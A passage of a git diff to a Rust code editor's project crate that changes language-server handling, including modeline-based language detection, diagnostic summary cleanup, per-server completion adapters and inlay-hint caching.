{ + self.invalidate_diagnostic_summaries_for_removed_entries(*worktree_id, changes, cx); + } WorktreeStoreEvent::WorktreeReleased(..) | WorktreeStoreEvent::WorktreeOrderChanged - | WorktreeStoreEvent::WorktreeUpdatedEntries(..) | WorktreeStoreEvent::WorktreeUpdatedGitRepositories(..) | WorktreeStoreEvent::WorktreeDeletedEntry(..) => {} } @@ -4418,7 +4484,7 @@ impl LspStore { cx: &mut Context, ) { match event { - language::BufferEvent::Edited => { + language::BufferEvent::Edited { .. } => { self.on_buffer_edited(buffer, cx); } @@ -4426,6 +4492,10 @@ impl LspStore { self.on_buffer_saved(buffer, cx); } + language::BufferEvent::Reloaded => { + self.on_buffer_reloaded(buffer, cx); + } + _ => {} } } @@ -4440,6 +4510,7 @@ impl LspStore { }) .detach(); + self.parse_modeline(buffer, cx); self.detect_language_for_buffer(buffer, cx); if let Some(local) = self.as_local_mut() { local.initialize_buffer(buffer, cx); @@ -4489,6 +4560,16 @@ impl LspStore { }) } + fn on_buffer_reloaded(&mut self, buffer: Entity, cx: &mut Context) { + if self.parse_modeline(&buffer, cx) { + self.detect_language_for_buffer(&buffer, cx); + } + + let buffer_id = buffer.read(cx).remote_id(); + let task = self.pull_diagnostics_for_buffer(buffer, cx); + self.buffer_reload_tasks.insert(buffer_id, task); + } + pub(crate) fn register_buffer_with_language_servers( &mut self, buffer: &Entity, @@ -4532,6 +4613,7 @@ impl LspStore { }; if refcount == 0 { lsp_store.lsp_data.remove(&buffer_id); + lsp_store.buffer_reload_tasks.remove(&buffer_id); let local = lsp_store.as_local_mut().unwrap(); local.registered_buffers.remove(&buffer_id); @@ -4711,6 +4793,56 @@ impl LspStore { }) } + fn parse_modeline(&mut self, buffer_handle: &Entity, cx: &mut Context) -> bool { + let buffer = buffer_handle.read(cx); + let content = buffer.as_rope(); + + let modeline_settings = { + let settings_store = cx.global::(); + let modeline_lines = settings_store + .raw_user_settings() + .and_then(|s| s.content.modeline_lines) + 
.or(settings_store.raw_default_settings().modeline_lines) + .unwrap_or(5); + + const MAX_MODELINE_BYTES: usize = 1024; + + let first_bytes = + content.clip_offset(content.len().min(MAX_MODELINE_BYTES), Bias::Left); + let mut first_lines = Vec::new(); + let mut lines = content.chunks_in_range(0..first_bytes).lines(); + for _ in 0..modeline_lines { + if let Some(line) = lines.next() { + first_lines.push(line.to_string()); + } else { + break; + } + } + let first_lines_ref: Vec<_> = first_lines.iter().map(|line| line.as_str()).collect(); + + let last_start = + content.clip_offset(content.len().saturating_sub(MAX_MODELINE_BYTES), Bias::Left); + let mut last_lines = Vec::new(); + let mut lines = content + .reversed_chunks_in_range(last_start..content.len()) + .lines(); + for _ in 0..modeline_lines { + if let Some(line) = lines.next() { + last_lines.push(line.to_string()); + } else { + break; + } + } + let last_lines_ref: Vec<_> = + last_lines.iter().rev().map(|line| line.as_str()).collect(); + modeline::parse_modeline(&first_lines_ref, &last_lines_ref) + }; + + log::debug!("Parsed modeline settings: {:?}", modeline_settings); + + buffer_handle.update(cx, |buffer, _cx| buffer.set_modeline(modeline_settings)) + } + fn detect_language_for_buffer( &mut self, buffer_handle: &Entity, @@ -4719,9 +4851,19 @@ impl LspStore { // If the buffer has a language, set it and start the language server if we haven't already. let buffer = buffer_handle.read(cx); let file = buffer.file()?; - let content = buffer.as_rope(); - let available_language = self.languages.language_for_file(file, Some(content), cx); + let modeline_settings = buffer.modeline().map(Arc::as_ref); + + let available_language = if let Some(ModelineSettings { + mode: Some(mode_name), + .. 
+ }) = modeline_settings + { + self.languages + .available_language_for_modeline_name(mode_name) + } else { + self.languages.language_for_file(file, Some(content), cx) + }; if let Some(available_language) = &available_language { if let Some(Ok(Ok(new_language))) = self .languages @@ -4766,8 +4908,12 @@ impl LspStore { } }); - let settings = - language_settings(Some(new_language.name()), buffer_file.as_ref(), cx).into_owned(); + let settings = LanguageSettings::resolve( + Some(&buffer_entity.read(cx)), + Some(&new_language.name()), + cx, + ) + .into_owned(); let buffer_file = File::from_dyn(buffer_file.as_ref()); let worktree_id = if let Some(file) = buffer_file { @@ -4893,7 +5039,7 @@ impl LspStore { buffer: &Entity, mut check: F, cx: &App, - ) -> Vec + ) -> Vec<(lsp::LanguageServerId, lsp::LanguageServerName)> where F: FnMut(&lsp::LanguageServerName, &lsp::ServerCapabilities) -> bool, { @@ -4923,7 +5069,7 @@ impl LspStore { .map(|c| (server_id, server_name, c)) }) .filter(|(_, server_name, capabilities)| check(server_name, capabilities)) - .map(|(server_id, _, _)| *server_id) + .map(|(server_id, server_name, _)| (*server_id, server_name.clone())) .collect() } @@ -4999,10 +5145,6 @@ impl LspStore { }; let status = request.status(); - if !request.check_capabilities(language_server.adapter_server_capabilities()) { - return Task::ready(Ok(Default::default())); - } - let request_timeout = ProjectSettings::get_global(cx) .global_lsp_settings .get_request_timeout(); @@ -5079,10 +5221,9 @@ impl LspStore { let mut language_formatters_to_check = Vec::new(); for buffer in self.buffer_store.read(cx).buffers() { let buffer = buffer.read(cx); - let buffer_file = File::from_dyn(buffer.file()); - let buffer_language = buffer.language(); - let settings = language_settings(buffer_language.map(|l| l.name()), buffer.file(), cx); - if buffer_language.is_some() { + let settings = LanguageSettings::for_buffer(buffer, cx); + if buffer.language().is_some() { + let buffer_file = 
File::from_dyn(buffer.file()); language_formatters_to_check.push(( buffer_file.map(|f| f.worktree_id(cx)), settings.into_owned(), @@ -5104,6 +5245,10 @@ impl LspStore { .clone(); self.semantic_token_config .update_rules(new_semantic_token_rules); + // Always clear cached stylizers so that changes to language-specific + // semantic token rules (e.g. from extension install/uninstall) are + // picked up. Stylizers are recreated lazily, so this is cheap. + self.semantic_token_config.clear_stylizers(); let new_global_semantic_tokens_mode = all_language_settings(None, cx).defaults.semantic_tokens; @@ -5528,9 +5673,9 @@ impl LspStore { }) .filter(|_| { maybe!({ - let language = buffer.read(cx).language_at(position)?; + buffer.read(cx).language_at(position)?; Some( - language_settings(Some(language.name()), buffer.read(cx).file(), cx) + LanguageSettings::for_buffer_at(&buffer.read(cx), position, cx) .linked_edits, ) }) == Some(true) @@ -5634,12 +5779,7 @@ impl LspStore { ) -> Task>> { let options = buffer.update(cx, |buffer, cx| { lsp_command::lsp_formatting_options( - language_settings( - buffer.language_at(position).map(|l| l.name()), - buffer.file(), - cx, - ) - .as_ref(), + LanguageSettings::for_buffer_at(buffer, position, cx).as_ref(), ) }); @@ -6121,23 +6261,13 @@ impl LspStore { let language = buffer.read(cx).language().cloned(); - // In the future, we should provide project guests with the names of LSP adapters, - // so that they can use the correct LSP adapter when computing labels. For now, - // guests just use the first LSP adapter associated with the buffer's language. 
- let lsp_adapter = language.as_ref().and_then(|language| { - language_registry - .lsp_adapters(&language.name()) - .first() - .cloned() - }); - let buffer = buffer.clone(); cx.spawn(async move |this, cx| { let requests = join_all( capable_lsps .into_iter() - .map(|id| { + .map(|(id, server_name)| { let request = GetCompletions { position, context: context.clone(), @@ -6145,7 +6275,14 @@ impl LspStore { }; let buffer = buffer.clone(); let language = language.clone(); - let lsp_adapter = lsp_adapter.clone(); + let lsp_adapter = language.as_ref().and_then(|language| { + let adapters = language_registry.lsp_adapters(&language.name()); + adapters + .iter() + .find(|adapter| adapter.name() == server_name) + .or_else(|| adapters.first()) + .cloned() + }); let upstream_client = upstream_client.clone(); let response = this .update(cx, |this, cx| { @@ -6184,13 +6321,9 @@ impl LspStore { let offset = position.to_offset(&snapshot); let scope = snapshot.language_scope_at(offset); let language = snapshot.language().cloned(); - let completion_settings = language_settings( - language.as_ref().map(|language| language.name()), - buffer.read(cx).file(), - cx, - ) - .completions - .clone(); + let completion_settings = LanguageSettings::for_buffer(&buffer.read(cx), cx) + .completions + .clone(); if !completion_settings.lsp { return Task::ready(Ok(Vec::new())); } @@ -6638,6 +6771,7 @@ impl LspStore { completions: Rc>>, completion_index: usize, push_to_history: bool, + all_commit_ranges: Vec>, cx: &mut Context, ) -> Task>> { if let Some((client, project_id)) = self.upstream_client() { @@ -6654,6 +6788,11 @@ impl LspStore { new_text: completion.new_text, source: completion.source, })), + all_commit_ranges: all_commit_ranges + .iter() + .cloned() + .map(language::proto::serialize_anchor_range) + .collect(), } }; @@ -6747,12 +6886,15 @@ impl LspStore { let has_overlap = if is_file_start_auto_import { false } else { - let start_within = primary.start.cmp(&range.start, buffer).is_le() - && 
primary.end.cmp(&range.start, buffer).is_ge(); - let end_within = range.start.cmp(&primary.end, buffer).is_le() - && range.end.cmp(&primary.end, buffer).is_ge(); - let result = start_within || end_within; - result + all_commit_ranges.iter().any(|commit_range| { + let start_within = + commit_range.start.cmp(&range.start, buffer).is_le() + && commit_range.end.cmp(&range.start, buffer).is_ge(); + let end_within = + range.start.cmp(&commit_range.end, buffer).is_le() + && range.end.cmp(&commit_range.end, buffer).is_ge(); + start_within || end_within + }) }; //Skip additional edits which overlap with the primary completion edit @@ -7030,6 +7172,21 @@ impl LspStore { .collect() } else { for (chunk, range_to_query) in ranges_to_query.into_iter().flatten() { + // When a server refresh was requested, other servers' cached hints + // are unaffected by the refresh and must be included in the result. + // Otherwise apply_fetched_hints (with should_invalidate()=true) + // removes all visible hints but only adds back the requesting + // server's new hints, permanently losing other servers' hints. 
+ let other_servers_cached: CacheInlayHints = if lsp_refresh_requested { + lsp_data + .inlay_hints + .cached_hints(&chunk) + .cloned() + .unwrap_or_default() + } else { + HashMap::default() + }; + let next_hint_id = next_hint_id.clone(); let buffer = buffer.clone(); let query_version = query_version.clone(); @@ -7048,33 +7205,32 @@ impl LspStore { if update_cache { lsp_data.inlay_hints.invalidate_for_chunk(chunk); } - HashMap::default() + other_servers_cached } else { - new_hints_by_server - .into_iter() - .map(|(server_id, new_hints)| { - let new_hints = new_hints - .into_iter() - .map(|new_hint| { - ( - InlayId::Hint(next_hint_id.fetch_add( - 1, - atomic::Ordering::AcqRel, - )), - new_hint, - ) - }) - .collect::>(); - if update_cache { - lsp_data.inlay_hints.insert_new_hints( - chunk, - server_id, - new_hints.clone(), - ); - } - (server_id, new_hints) - }) - .collect() + let mut result = other_servers_cached; + for (server_id, new_hints) in new_hints_by_server { + let new_hints = new_hints + .into_iter() + .map(|new_hint| { + ( + InlayId::Hint(next_hint_id.fetch_add( + 1, + atomic::Ordering::AcqRel, + )), + new_hint, + ) + }) + .collect::>(); + if update_cache { + lsp_data.inlay_hints.insert_new_hints( + chunk, + server_id, + new_hints.clone(), + ); + } + result.insert(server_id, new_hints); + } + result } }) }) @@ -8089,6 +8245,60 @@ impl LspStore { } } + fn invalidate_diagnostic_summaries_for_removed_entries( + &mut self, + worktree_id: WorktreeId, + changes: &UpdatedEntriesSet, + cx: &mut Context, + ) { + let Some(summaries_for_tree) = self.diagnostic_summaries.get_mut(&worktree_id) else { + return; + }; + + let mut cleared_paths: Vec = Vec::new(); + let mut cleared_server_ids: HashSet = HashSet::default(); + let downstream = self.downstream_client.clone(); + + for (path, _, _) in changes + .iter() + .filter(|(_, _, change)| *change == PathChange::Removed) + { + if let Some(summaries_by_server_id) = summaries_for_tree.remove(path) { + for (server_id, _) in 
&summaries_by_server_id { + cleared_server_ids.insert(*server_id); + if let Some((client, project_id)) = &downstream { + client + .send(proto::UpdateDiagnosticSummary { + project_id: *project_id, + worktree_id: worktree_id.to_proto(), + summary: Some(proto::DiagnosticSummary { + path: path.as_ref().to_proto(), + language_server_id: server_id.0 as u64, + error_count: 0, + warning_count: 0, + }), + more_summaries: Vec::new(), + }) + .ok(); + } + } + cleared_paths.push(ProjectPath { + worktree_id, + path: path.clone(), + }); + } + } + + if !cleared_paths.is_empty() { + for server_id in cleared_server_ids { + cx.emit(LspStoreEvent::DiagnosticsUpdated { + server_id, + paths: cleared_paths.clone(), + }); + } + } + } + pub fn shared( &mut self, project_id: u64, @@ -8173,6 +8383,7 @@ impl LspStore { LanguageServerStatus { name, server_version: None, + server_readable_version: None, pending_work: Default::default(), has_pending_diagnostic_updates: false, progress_tokens: Default::default(), @@ -9363,6 +9574,7 @@ impl LspStore { LanguageServerStatus { name: server_name.clone(), server_version: None, + server_readable_version: None, pending_work: Default::default(), has_pending_diagnostic_updates: false, progress_tokens: Default::default(), @@ -9805,7 +10017,9 @@ impl LspStore { let typ = match event.kind? 
{ PathEventKind::Created => lsp::FileChangeType::CREATED, PathEventKind::Removed => lsp::FileChangeType::DELETED, - PathEventKind::Changed => lsp::FileChangeType::CHANGED, + PathEventKind::Changed | PathEventKind::Rescan => { + lsp::FileChangeType::CHANGED + } }; Some(lsp::FileEvent { uri: file_path_to_lsp_url(&event.path).log_err()?, @@ -10399,13 +10613,19 @@ impl LspStore { envelope: TypedEnvelope, mut cx: AsyncApp, ) -> Result { - let (buffer, completion) = this.update(&mut cx, |this, cx| { + let (buffer, completion, all_commit_ranges) = this.update(&mut cx, |this, cx| { let buffer_id = BufferId::new(envelope.payload.buffer_id)?; let buffer = this.buffer_store.read(cx).get_existing(buffer_id)?; let completion = Self::deserialize_completion( envelope.payload.completion.context("invalid completion")?, )?; - anyhow::Ok((buffer, completion)) + let all_commit_ranges = envelope + .payload + .all_commit_ranges + .into_iter() + .map(language::proto::deserialize_anchor_range) + .collect::, _>>()?; + anyhow::Ok((buffer, completion, all_commit_ranges)) })?; let apply_additional_edits = this.update(&mut cx, |this, cx| { @@ -10425,6 +10645,7 @@ impl LspStore { }]))), 0, false, + all_commit_ranges, cx, ) }); @@ -10739,6 +10960,7 @@ impl LspStore { } }); + let mut cleared_paths: Vec = Vec::new(); for (worktree_id, summaries) in self.diagnostic_summaries.iter_mut() { summaries.retain(|path, summaries_by_server_id| { if summaries_by_server_id.remove(&server_id).is_some() { @@ -10757,12 +10979,22 @@ impl LspStore { }) .log_err(); } + cleared_paths.push(ProjectPath { + worktree_id: *worktree_id, + path: path.clone(), + }); !summaries_by_server_id.is_empty() } else { true } }); } + if !cleared_paths.is_empty() { + cx.emit(LspStoreEvent::DiagnosticsUpdated { + server_id, + paths: cleared_paths, + }); + } let local = self.as_local_mut().unwrap(); for diagnostics in local.diagnostics.values_mut() { @@ -11023,23 +11255,6 @@ impl LspStore { 
cx.background_spawn(futures::future::join_all(tasks).map(|_| ())) } - fn get_buffer<'a>(&self, abs_path: &Path, cx: &'a App) -> Option<&'a Buffer> { - let (worktree, relative_path) = - self.worktree_store.read(cx).find_worktree(&abs_path, cx)?; - - let project_path = ProjectPath { - worktree_id: worktree.read(cx).id(), - path: relative_path, - }; - - Some( - self.buffer_store() - .read(cx) - .get_by_path(&project_path)? - .read(cx), - ) - } - #[cfg(any(test, feature = "test-support"))] pub fn update_diagnostics( &mut self, @@ -11319,6 +11534,7 @@ impl LspStore { LanguageServerStatus { name: language_server.name(), server_version: language_server.version(), + server_readable_version: language_server.readable_version(), pending_work: Default::default(), has_pending_diagnostic_updates: false, progress_tokens: Default::default(), @@ -11406,6 +11622,15 @@ impl LspStore { let buffer_id = buffer.remote_id(); if local.registered_buffers.contains_key(&buffer_id) { + let abs_path = file.abs_path(cx); + let uri = match lsp::Uri::from_file_path(&abs_path) { + Ok(uri) => uri, + Err(()) => { + log::error!("failed to convert path to URI: {:?}", abs_path); + continue; + } + }; + let versions = local .buffer_snapshots .entry(buffer_id) @@ -11427,14 +11652,13 @@ impl LspStore { let snapshot = versions.last().unwrap(); let version = snapshot.version; let initial_snapshot = &snapshot.snapshot; - let uri = lsp::Uri::from_file_path(file.abs_path(cx)).unwrap(); language_server.register_buffer( uri, adapter.language_id(&language.name()), version, initial_snapshot.text(), ); - buffer_paths_registered.push((buffer_id, file.abs_path(cx))); + buffer_paths_registered.push((buffer_id, abs_path)); local .buffers_opened_in_servers .entry(buffer_id) @@ -13964,6 +14188,7 @@ impl LspAdapter for SshLspAdapter { async fn initialization_options( self: Arc, _: &Arc, + _: &mut AsyncApp, ) -> Result> { let Some(options) = &self.initialization_options else { return Ok(None); @@ -14407,3 +14632,25 @@ pub fn 
ensure_uniform_list_compatible_label(label: &mut CodeLabel) { label.text = new_text; } + +/// Apply edits to the buffer that will become part of the formatting transaction. +/// Fails if the buffer has been edited since the start of that transaction. +fn extend_formatting_transaction( + buffer: &FormattableBuffer, + formatting_transaction_id: text::TransactionId, + cx: &mut AsyncApp, + operation: impl FnOnce(&mut Buffer, &mut Context), +) -> anyhow::Result<()> { + buffer.handle.update(cx, |buffer, cx| { + let last_transaction_id = buffer.peek_undo_stack().map(|t| t.transaction_id()); + if last_transaction_id != Some(formatting_transaction_id) { + anyhow::bail!("Buffer edited while formatting. Aborting") + } + buffer.start_transaction(); + operation(buffer, cx); + if let Some(transaction_id) = buffer.end_transaction(cx) { + buffer.merge_transactions(transaction_id, formatting_transaction_id); + } + Ok(()) + }) +} diff --git a/crates/project/src/lsp_store/json_language_server_ext.rs b/crates/project/src/lsp_store/json_language_server_ext.rs index 13c3aeb2b1ab2f4ab5f22a3cd065d4d0ff4bcb38..1f2fa0330b75deeb41342ae2401ddc8dbe05159c 100644 --- a/crates/project/src/lsp_store/json_language_server_ext.rs +++ b/crates/project/src/lsp_store/json_language_server_ext.rs @@ -42,8 +42,8 @@ impl lsp::notification::Notification for SchemaContentsChanged { type Params = String; } -pub fn notify_schema_changed(lsp_store: Entity, uri: String, cx: &App) { - zlog::trace!(LOGGER => "Notifying schema changed for URI: {:?}", uri); +pub fn notify_schemas_changed(lsp_store: Entity, uris: &[String], cx: &App) { + zlog::trace!(LOGGER => "Notifying schema changes for URIs: {:?}", uris); let servers = lsp_store.read_with(cx, |lsp_store, _| { let mut servers = Vec::new(); let Some(local) = lsp_store.as_local() else { @@ -63,16 +63,18 @@ pub fn notify_schema_changed(lsp_store: Entity, uri: String, cx: &App) servers }); for server in servers { - zlog::trace!(LOGGER => "Notifying server {NAME} (id 
{ID:?}) of schema change for URI: {uri:?}", - NAME = server.name(), - ID = server.server_id() - ); - if let Err(error) = server.notify::(uri.clone()) { - zlog::error!( - LOGGER => "Failed to notify server {NAME} (id {ID:?}) of schema change for URI {uri:?}: {error:#}", - NAME = server.name(), - ID = server.server_id(), + for uri in uris { + zlog::trace!(LOGGER => "Notifying server {NAME} (id {ID:?}) of schema change for URI: {uri:?}", + NAME = server.name(), + ID = server.server_id() ); + if let Err(error) = server.notify::(uri.clone()) { + zlog::error!( + LOGGER => "Failed to notify server {NAME} (id {ID:?}) of schema change for URI {uri:?}: {error:#}", + NAME = server.name(), + ID = server.server_id(), + ); + } } } } diff --git a/crates/project/src/lsp_store/lsp_ext_command.rs b/crates/project/src/lsp_store/lsp_ext_command.rs index 270db67576f0a02155997757a01d489d44ef1766..9c284a143613c47aa3a5fcc9af5afac9d6dbbf4d 100644 --- a/crates/project/src/lsp_store/lsp_ext_command.rs +++ b/crates/project/src/lsp_store/lsp_ext_command.rs @@ -211,10 +211,10 @@ impl LspCommand for OpenDocs { _: &Arc, _: &App, ) -> Result { + let uri = lsp::Uri::from_file_path(path) + .map_err(|()| anyhow::anyhow!("{path:?} is not a valid URI"))?; Ok(OpenDocsParams { - text_document: lsp::TextDocumentIdentifier { - uri: lsp::Uri::from_file_path(path).unwrap(), - }, + text_document: lsp::TextDocumentIdentifier { uri }, position: point_to_lsp(self.position), }) } diff --git a/crates/project/src/lsp_store/semantic_tokens.rs b/crates/project/src/lsp_store/semantic_tokens.rs index e71b05d47b0cf105429bf50648787fb1db2bad87..0f01c6350ece89569535dca571c28597ff77384b 100644 --- a/crates/project/src/lsp_store/semantic_tokens.rs +++ b/crates/project/src/lsp_store/semantic_tokens.rs @@ -12,8 +12,11 @@ use gpui::{App, AppContext, AsyncApp, Context, Entity, ReadGlobal as _, SharedSt use language::{Buffer, LanguageName, language_settings::all_language_settings}; use lsp::{AdapterServerCapabilities, 
LanguageServerId}; use rpc::{TypedEnvelope, proto}; -use settings::{SemanticTokenRule, SemanticTokenRules, Settings as _, SettingsStore}; +use settings::{ + DefaultSemanticTokenRules, SemanticTokenRule, SemanticTokenRules, Settings as _, SettingsStore, +}; use smol::future::yield_now; + use text::{Anchor, Bias, OffsetUtf16, PointUtf16, Unclipped}; use util::ResultExt as _; @@ -58,6 +61,15 @@ impl SemanticTokenConfig { } } + /// Clears all cached stylizers. + /// + /// This is called when settings change to ensure that any modifications to + /// language-specific semantic token rules (e.g. from extension install/uninstall) + /// are picked up. Stylizers are recreated lazily on next use. + pub(super) fn clear_stylizers(&mut self) { + self.stylizers.clear(); + } + pub(super) fn update_global_mode(&mut self, new_mode: settings::SemanticTokens) -> bool { if new_mode != self.global_mode { self.global_mode = new_mode; @@ -462,6 +474,7 @@ impl SemanticTokenStylizer { let global_rules = &ProjectSettings::get_global(cx) .global_lsp_settings .semantic_token_rules; + let default_rules = cx.global::(); let rules_by_token_type = token_types .iter() @@ -475,6 +488,7 @@ impl SemanticTokenStylizer { .rules .iter() .chain(language_rules.into_iter().flat_map(|lr| &lr.rules)) + .chain(default_rules.0.rules.iter()) .rev() .filter(filter) .cloned() @@ -571,8 +585,7 @@ async fn raw_to_buffer_semantic_tokens( } Some(BufferSemanticToken { - range: buffer_snapshot.anchor_before(start) - ..buffer_snapshot.anchor_after(end), + range: buffer_snapshot.anchor_range_inside(start..end), token_type: token.token_type, token_modifiers: token.token_modifiers, }) @@ -597,6 +610,14 @@ pub struct SemanticTokensData { update: Option<(Global, SemanticTokensTask)>, } +impl SemanticTokensData { + pub(super) fn remove_server_data(&mut self, server_id: LanguageServerId) { + self.raw_tokens.servers.remove(&server_id); + self.latest_invalidation_requests.remove(&server_id); + self.update = None; + } +} + /// All 
the semantic token tokens for a buffer. /// /// This aggregates semantic tokens from multiple language servers in a specific order. diff --git a/crates/project/src/manifest_tree.rs b/crates/project/src/manifest_tree.rs index 82dd1bc0d3fdd0149ced5ce3f2cf9ae480c9f2b7..fb1b7e96e4a20370493e0837360a28583ffbbfc0 100644 --- a/crates/project/src/manifest_tree.rs +++ b/crates/project/src/manifest_tree.rs @@ -59,6 +59,7 @@ impl WorktreeRoots { let path = TriePath::from(entry.path.as_ref()); this.roots.remove(&path); } + WorktreeEvent::Deleted | WorktreeEvent::UpdatedRootRepoCommonDir => {} } }), }) diff --git a/crates/project/src/prettier_store.rs b/crates/project/src/prettier_store.rs index 95150fda070e488cd9d6d43238c5aa99515aa271..b66f2d5e0c041e104cf109a48b6bad249b492b88 100644 --- a/crates/project/src/prettier_store.rs +++ b/crates/project/src/prettier_store.rs @@ -1,5 +1,5 @@ use std::{ - ops::ControlFlow, + ops::{ControlFlow, Range}, path::{Path, PathBuf}, sync::Arc, time::Duration, @@ -15,7 +15,7 @@ use futures::{ }; use gpui::{AppContext as _, AsyncApp, Context, Entity, EventEmitter, Task, WeakEntity}; use language::{ - Buffer, LanguageRegistry, LocalFile, + Buffer, LanguageRegistry, LocalFile, OffsetUtf16, language_settings::{Formatter, LanguageSettings}, }; use lsp::{LanguageServer, LanguageServerId, LanguageServerName}; @@ -736,6 +736,7 @@ pub fn prettier_plugins_for_language( pub(super) async fn format_with_prettier( prettier_store: &WeakEntity, buffer: &Entity, + range_utf16: Option>, cx: &mut AsyncApp, ) -> Option> { let prettier_instance = prettier_store @@ -772,7 +773,14 @@ pub(super) async fn format_with_prettier( }); let format_result = prettier - .format(buffer, buffer_path, ignore_dir, request_timeout, cx) + .format( + buffer, + buffer_path, + ignore_dir, + range_utf16, + request_timeout, + cx, + ) .await .with_context(|| format!("{} failed to format buffer", prettier_description)); diff --git a/crates/project/src/project.rs b/crates/project/src/project.rs 
index 9e37802213dfb8df5cf63af5648044ae8ec65ecb..0ec3366ca8f9f6c6e4e3cbd411e1894de4d0f2b8 100644 --- a/crates/project/src/project.rs +++ b/crates/project/src/project.rs @@ -33,7 +33,7 @@ pub mod search_history; pub mod yarn; use dap::inline_value::{InlineValueLocation, VariableLookupKind, VariableScope}; -use itertools::Either; +use itertools::{Either, Itertools}; use crate::{ git_store::GitStore, @@ -43,12 +43,11 @@ use crate::{ worktree_store::WorktreeIdCounter, }; pub use agent_registry_store::{AgentRegistryStore, RegistryAgent}; -pub use agent_server_store::{ - AgentServerStore, AgentServersUpdated, ExternalAgentServerName, ExternalAgentSource, -}; +pub use agent_server_store::{AgentId, AgentServerStore, AgentServersUpdated, ExternalAgentSource}; pub use git_store::{ ConflictRegion, ConflictSet, ConflictSetSnapshot, ConflictSetUpdate, git_traversal::{ChildEntriesGitIter, GitEntry, GitEntryRef, GitTraversal}, + linked_worktree_short_name, worktrees_directory_for_repo, }; pub use manifest_tree::ManifestTree; pub use project_search::{Search, SearchResults}; @@ -121,6 +120,7 @@ use std::{ borrow::Cow, collections::BTreeMap, ffi::OsString, + future::Future, ops::{Not as _, Range}, path::{Path, PathBuf}, pin::pin, @@ -135,6 +135,7 @@ use text::{Anchor, BufferId, OffsetRangeExt, Point, Rope}; use toolchain_store::EmptyToolchainStore; use util::{ ResultExt as _, maybe, + path_list::PathList, paths::{PathStyle, SanitizedPath, is_absolute}, rel_path::RelPath, }; @@ -149,6 +150,8 @@ pub use fs::*; pub use language::Location; #[cfg(any(test, feature = "test-support"))] pub use prettier::FORMAT_SUFFIX as TEST_PRETTIER_FORMAT_SUFFIX; +#[cfg(any(test, feature = "test-support"))] +pub use prettier::RANGE_FORMAT_SUFFIX as TEST_PRETTIER_RANGE_FORMAT_SUFFIX; pub use task_inventory::{ BasicContextProvider, ContextProviderWithTasks, DebugScenarioContext, Inventory, TaskContexts, TaskSourceKind, @@ -306,7 +309,7 @@ enum ProjectClientState { /// Multi-player mode but still a local 
project. Shared { remote_id: u64 }, /// Multi-player mode but working on a remote project. - Remote { + Collab { sharing_has_stopped: bool, capability: Capability, remote_id: u64, @@ -1029,6 +1032,8 @@ impl DirectoryLister { } } +pub const CURRENT_PROJECT_FEATURES: &[&str] = &["new-style-anchors"]; + #[cfg(feature = "test-support")] pub const DEFAULT_COMPLETION_CONTEXT: CompletionContext = CompletionContext { trigger_kind: lsp::CompletionTriggerKind::INVOKED, @@ -1185,7 +1190,6 @@ impl Project { worktree_store.clone(), environment.clone(), manifest_tree.clone(), - fs.clone(), cx, ) }); @@ -1226,12 +1230,23 @@ impl Project { ) }); + let git_store = cx.new(|cx| { + GitStore::local( + &worktree_store, + buffer_store.clone(), + environment.clone(), + fs.clone(), + cx, + ) + }); + let task_store = cx.new(|cx| { TaskStore::local( buffer_store.downgrade(), worktree_store.clone(), toolchain_store.read(cx).as_language_toolchain_store(), environment.clone(), + git_store.clone(), cx, ) }); @@ -1267,16 +1282,6 @@ impl Project { ) }); - let git_store = cx.new(|cx| { - GitStore::local( - &worktree_store, - buffer_store.clone(), - environment.clone(), - fs.clone(), - cx, - ) - }); - let agent_server_store = cx.new(|cx| { AgentServerStore::local( node.clone(), @@ -1411,30 +1416,6 @@ impl Project { ) }); - let task_store = cx.new(|cx| { - TaskStore::remote( - buffer_store.downgrade(), - worktree_store.clone(), - toolchain_store.read(cx).as_language_toolchain_store(), - remote.read(cx).proto_client(), - REMOTE_SERVER_PROJECT_ID, - cx, - ) - }); - - let settings_observer = cx.new(|cx| { - SettingsObserver::new_remote( - fs.clone(), - worktree_store.clone(), - task_store.clone(), - Some(remote_proto.clone()), - false, - cx, - ) - }); - cx.subscribe(&settings_observer, Self::on_settings_observer_event) - .detach(); - let context_server_store = cx.new(|cx| { ContextServerStore::remote( rpc::proto::REMOTE_SERVER_PROJECT_ID, @@ -1499,8 +1480,38 @@ impl Project { ) }); - let 
agent_server_store = - cx.new(|_| AgentServerStore::remote(REMOTE_SERVER_PROJECT_ID, remote.clone())); + let task_store = cx.new(|cx| { + TaskStore::remote( + buffer_store.downgrade(), + worktree_store.clone(), + toolchain_store.read(cx).as_language_toolchain_store(), + remote.read(cx).proto_client(), + REMOTE_SERVER_PROJECT_ID, + git_store.clone(), + cx, + ) + }); + + let settings_observer = cx.new(|cx| { + SettingsObserver::new_remote( + fs.clone(), + worktree_store.clone(), + task_store.clone(), + Some(remote_proto.clone()), + false, + cx, + ) + }); + cx.subscribe(&settings_observer, Self::on_settings_observer_event) + .detach(); + + let agent_server_store = cx.new(|_| { + AgentServerStore::remote( + REMOTE_SERVER_PROJECT_ID, + remote.clone(), + worktree_store.clone(), + ) + }); cx.subscribe(&remote, Self::on_remote_client_event).detach(); @@ -1637,6 +1648,10 @@ impl Project { project_id: remote_id, committer_email: committer.email, committer_name: committer.name, + features: CURRENT_PROJECT_FEATURES + .iter() + .map(|s| s.to_string()) + .collect(), }) .await?; Self::from_join_project_response( @@ -1719,6 +1734,17 @@ impl Project { ) }); + let git_store = cx.new(|cx| { + GitStore::remote( + // In this remote case we pass None for the environment + &worktree_store, + buffer_store.clone(), + client.clone().into(), + remote_id, + cx, + ) + }); + let task_store = cx.new(|cx| { if run_tasks { TaskStore::remote( @@ -1727,6 +1753,7 @@ impl Project { Arc::new(EmptyToolchainStore), client.clone().into(), remote_id, + git_store.clone(), cx, ) } else { @@ -1745,17 +1772,6 @@ impl Project { ) }); - let git_store = cx.new(|cx| { - GitStore::remote( - // In this remote case we pass None for the environment - &worktree_store, - buffer_store.clone(), - client.clone().into(), - remote_id, - cx, - ) - }); - let agent_server_store = cx.new(|_cx| AgentServerStore::collab()); let replica_id = ReplicaId::new(response.payload.replica_id as u16); @@ -1815,7 +1831,7 @@ impl Project { 
